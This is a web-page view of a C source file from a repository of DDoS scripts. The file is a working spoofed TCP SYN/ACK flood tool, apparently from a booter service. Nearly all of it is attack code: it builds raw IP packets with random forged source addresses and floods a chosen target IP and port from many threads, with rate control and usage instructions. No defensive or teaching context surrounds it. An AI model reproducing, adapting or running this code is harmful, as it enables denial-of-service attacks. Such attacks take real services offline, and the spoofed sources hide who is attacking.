Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/L4/TCP/tcp-synack.c
4565 views
1
// TCP-SYNACK spoofed attack.

2
// © Booter.pw 2019

3


4
// Imports.

5
#include<stdio.h>

6
#include<string.h>

7
#include<sys/socket.h>

8
#include<stdlib.h>

9
#include<errno.h>

10
#include<netinet/tcp.h>

11
#include <arpa/inet.h>

12
#include<netinet/ip.h>

13
#include <pthread.h>

14
#include <stdint.h>

15
#include <unistd.h>

16
#include <sys/types.h>

17
#include <stdbool.h>

18
#include <time.h>

19


20
// Declaration of start global variables.

21
static unsigned int floodport;

22
#define BUFFER_SIZE 100

23
char sourceip[17];

24
volatile int limiter; // PPS Limitator.

25
volatile unsigned int pps; // PPS per Second, Global variable including for Threads.

26
volatile unsigned int sleeptime = 100; // Sleep in miliseconds for each packet if pps exeded.

27
volatile unsigned int lenght_pkt = 0;

28


29
// Structure of the pseudo-header object.

30
struct pseudo_header

31
{

32
    u_int32_t source_address;

33
    u_int32_t dest_address;

34
    u_int8_t placeholder;

35
    u_int8_t protocol;

36
    u_int16_t tcp_length;

37
    struct tcphdr tcp;

38
};

39


40
unsigned short checksum_tcp_packet(unsigned short *ptr,int nbytes) {

41
    // Variables for csum.

42
    register long sum;

43
    unsigned short oddbyte;

44
    register short answer;

45
 

46
    sum=0;

47
    while(nbytes>1) {

48
        sum+=*ptr++;

49
        nbytes-=2;

50
    }

51
    if(nbytes==1) {

52
        oddbyte=0;

53
        *((u_char*)&oddbyte)=*(u_char*)ptr;

54
        sum+=oddbyte;

55
    }

56
 

57
    sum = (sum>>16)+(sum & 0xffff);

58
    sum = sum + (sum>>16);

59
    answer=(short)~sum;

60


61
    return(answer);

62
}

63


64
void *flooding_thread(void *par1)

65
{

66
    // Make socket

67
    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);

68
    if(s == -1)

69
    {

70
        perror("[!] For use Script you need root stupid...");

71
        exit(1);

72
    }

73


74
    // Declares

75
    char *targettr = (char *)par1;

76
    char datagram[4096] , source_ip[32] , *data , *pseudogram;

77
    

78
    // Zero out the packet buffer.

79
    memset (datagram, 0, 4096);

80


81
    // IPv4 header.

82
    struct iphdr *iph = (struct iphdr *) datagram;

83


84
    // TCP header.

85
    struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));

86
    struct sockaddr_in sin;

87
    struct pseudo_header psh;

88


89
    //Data part

90
    data = datagram + sizeof(struct iphdr) + sizeof(struct tcphdr);

91
    if (lenght_pkt == 0)  { // Bypass pps.

92
        data = "";

93
    }

94


95
    // Source Address and Such.

96
    char primera [ 20 ] ;

97
    int one_r = random_number_beetwhen(1, 250);

98
    int two_r = random_number_beetwhen(1, 250);

99
    int three_r = random_number_beetwhen(1, 250);

100
    int four_r = random_number_beetwhen(1, 250);

101


102
    snprintf(primera, sizeof(primera)-1, "%d.%d.%d.%d", one_r, two_r, three_r, four_r);

103
    snprintf(sourceip, sizeof(sourceip)-1, primera);

104
    strcpy(source_ip , sourceip);

105
    sin.sin_family = AF_INET;

106
    int rdzeroport;

107
    if (floodport == 1) { // Random destination port.

108
        rdzeroport = random_number_beetwhen(2, 65535);

109
        sin.sin_port = htons(rdzeroport);

110
        tcph->dest = htons (rdzeroport);

111
    } else {

112
        sin.sin_port = htons(floodport);

113
        tcph->dest = htons (floodport);

114
    }

115


116
    // All other IP packet header.

117
    sin.sin_addr.s_addr = inet_addr (targettr);

118
    iph->ihl = 5;

119
    iph->version = 4;

120
    iph->tos = 0;

121
    iph->tot_len = sizeof (struct iphdr) + sizeof (struct tcphdr) + strlen(data);

122
    iph->id = htons(1);

123
    iph->frag_off = 0;

124
    iph->ttl = 64;

125
    iph->protocol = IPPROTO_TCP;

126
    iph->check = 0; 

127
    iph->saddr = inet_addr ( source_ip );  

128
    iph->daddr = sin.sin_addr.s_addr;

129
    iph->check = checksum_tcp_packet ((unsigned short *) datagram, iph->tot_len);

130
    int randSeq = random_number_beetwhen(10000, 99999);

131
    int randAckSeq = random_number_beetwhen(10000, 99999);

132
    int randSP = random_number_beetwhen(2, 65535);

133
    //int randPD = random_number_beetwhen(2, 65535);

134
    //int randttl = random_number_beetwhen(1, 255);

135
    //int randihl = random_number_beetwhen(4, 7);

136
    int randWin = random_number_beetwhen(1000, 9999);

137
    tcph->source = randSP;

138
    tcph->seq = randSeq;

139
    tcph->ack_seq = 0;

140
    tcph->doff = 5;

141
    tcph->fin=0;

142
    tcph->syn=1;

143
    tcph->rst=0;

144
    tcph->psh=0;

145
    tcph->ack=0;

146
    tcph->urg=0;

147
    tcph->window = randWin;

148
    tcph->check = 0;

149
    tcph->urg_ptr = 0;

150


151
    psh.source_address = inet_addr( source_ip );

152
    psh.dest_address = sin.sin_addr.s_addr;

153
    psh.placeholder = 0;

154
    psh.protocol = IPPROTO_TCP;

155
    psh.tcp_length = htons(sizeof(struct tcphdr) + strlen(data) );

156
    int psize = sizeof(struct pseudo_header) + sizeof(struct tcphdr) + strlen(data);

157
    pseudogram = malloc(psize);

158
    memcpy(pseudogram , (char*) &psh , sizeof (struct pseudo_header));

159
    memcpy(pseudogram + sizeof(struct pseudo_header) , tcph , sizeof(struct tcphdr) + strlen(data));

160
    tcph->check = checksum_tcp_packet( (unsigned short*) pseudogram , psize);

161
    free(pseudogram);

162
    int one = 1;

163
    const int *val = &one;

164
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)

165
    {

166
        exit(0);

167
    }

168
    int i;

169
    while (1)

170
    {

171
        //Send the packet

172
        if (sendto (s, datagram, iph->tot_len ,  0, (struct sockaddr *) &sin, sizeof (sin)) < 0)       /* a normal send() */

173
        {

174
            // ok

175
        } else {

176
            // Generate new IP.

177
            one_r = random_number_beetwhen(1, 250);

178
            two_r = random_number_beetwhen(1, 250);

179
            three_r = random_number_beetwhen(1, 250);

180
            four_r = random_number_beetwhen(1, 250);

181
            snprintf(primera, sizeof(primera)-1, "%d.%d.%d.%d", one_r, two_r, three_r, four_r);

182
            snprintf(sourceip, sizeof(sourceip)-1, primera);

183
            strcpy(source_ip , sourceip);

184
            iph->saddr = inet_addr ( source_ip ); 

185
            psh.source_address = inet_addr( source_ip );

186
            if (lenght_pkt == 0) { // Bypass pps.

187
                data = "";

188
            }

189
            if (floodport == 0) {

190
                rdzeroport = random_number_beetwhen(2, 65535);

191
                sin.sin_port = htons(rdzeroport);

192
                tcph->dest = htons (rdzeroport);

193
            } else {

194
                sin.sin_port = htons(floodport);

195
                tcph->dest = htons (floodport);

196
            }

197
            randSeq = random_number_beetwhen(10000, 99999);

198
            randSP = random_number_beetwhen(2, 65535);

199
            //randPD = random_number_beetwhen(2, 65535);

200
            //randttl = random_number_beetwhen(1, 255);

201
            tcph->source = randSP;

202
            tcph->doff = 5;      // First and only TCP segment, reset option. 

203
            tcph->seq = htons(randSeq);

204
            tcph->psh  = 0; 

205
            tcph->fin  = 0;

206
            tcph->rst  = 0;

207
            tcph->res2 = 0;

208
            tcph->doff = 5;

209
            if (random_number_beetwhen(1, 2) == 1) {

210
                tcph->syn = 1; 

211
                tcph->ack  = 0;

212
                tcph->ack_seq = 0;

213
            } else { // ACK

214
                tcph->syn = 0; 

215
                tcph->ack  = 1;

216
                randAckSeq = random_number_beetwhen(10000, 99999);

217
                tcph->ack_seq = randAckSeq;

218
            }

219
            tcph->urg  = 0;

220
            tcph->urg_ptr = 0;

221


222
            tcph->window = htons(512);

223
            tcph->check = 0;

224


225
            iph->tot_len = sizeof (struct iphdr) + sizeof (struct tcphdr) + strlen(data);

226
            iph->protocol = IPPROTO_TCP;

227
            iph->check = 0;

228
            iph->daddr = sin.sin_addr.s_addr;

229
            iph->check = checksum_tcp_packet ((unsigned short *) datagram, iph->tot_len);

230
            psh.tcp_length = htons(sizeof(struct tcphdr) + strlen(data) );

231
            int psize = sizeof(struct pseudo_header) + sizeof(struct tcphdr) + strlen(data);

232
            pseudogram = malloc(psize);

233
            memcpy(pseudogram , (char*) &psh , sizeof (struct pseudo_header));

234
            memcpy(pseudogram + sizeof(struct pseudo_header) , tcph , sizeof(struct tcphdr) + strlen(data));

235
            tcph->check = checksum_tcp_packet( (unsigned short*) pseudogram , psize);

236
            free(pseudogram);

237
            int one = 1;

238
            const int *val = &one;

239
            if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)

240
            {

241
                exit(0);

242
            }

243
            pps++;

244
            if(i >= limiter)

245
            {

246
                i = 0;

247
                usleep(sleeptime);

248
            }

249
            i++;

250
        }   

251
    }

252
}

253
int random_number_beetwhen(int min, int max) {

254
   static bool first = true;

255
   if (first) {  

256
      srand( time(NULL) );

257
      first = false;

258
   }

259
   return min + rand() % (max + 1 - min);

260
}

261
int main(int argc, char *argv[ ])

262
{

263
    if(argc < 6){

264
        fprintf(stderr, "[+] TCP-SYNACK © Booter.pw 2019 by @Alemalakra.\n");

265
        fprintf(stdout, "[+] Usage: %s <IP> <PORT> <THREADS> <TIME> <PPS>\n", argv[0]);

266
        exit(-1);

267
    }

268
    int multiplier = 20;

269
    pps = 0;

270
    limiter = 0;

271


272
    // Arguments of Method.

273


274
    floodport = atoi(argv[2]);

275
    void * target = argv[1];

276
    int maxim_pps = atoi(argv[5]);

277
    int num_threads = atoi(argv[3]);

278
    lenght_pkt = 0;

279
    pthread_t thread[num_threads];

280
    int alem = 0;

281
    int i;

282
    fprintf(stdout, "[+] Starting threads (This may take some seconds.)\n");

283
    for(alem = 0;alem<num_threads;alem++){

284
      pthread_create( &thread[alem], NULL, &flooding_thread, (void *)argv[1]); // Target

285
    }

286
    fprintf(stdout, "[-] Attack started.\n");

287
    for(i = 0;i<(atoi(argv[4])*multiplier);i++) {

288
        usleep((1000/multiplier)*1000);

289
        if((pps*multiplier) > maxim_pps)

290
        {

291
            if(1 > limiter)

292
            {

293
                sleeptime+=100;

294
            } else {

295
                limiter--;

296
            }

297
        } else {

298
            limiter++;

299
            if(sleeptime > 25)

300
            {

301
                sleeptime-=25;

302
            } else {

303
                sleeptime = 0;

304
            }

305
        }

306
        pps = 0;

307
    }    

308
     

309
    return 0;

310
}

311


312


313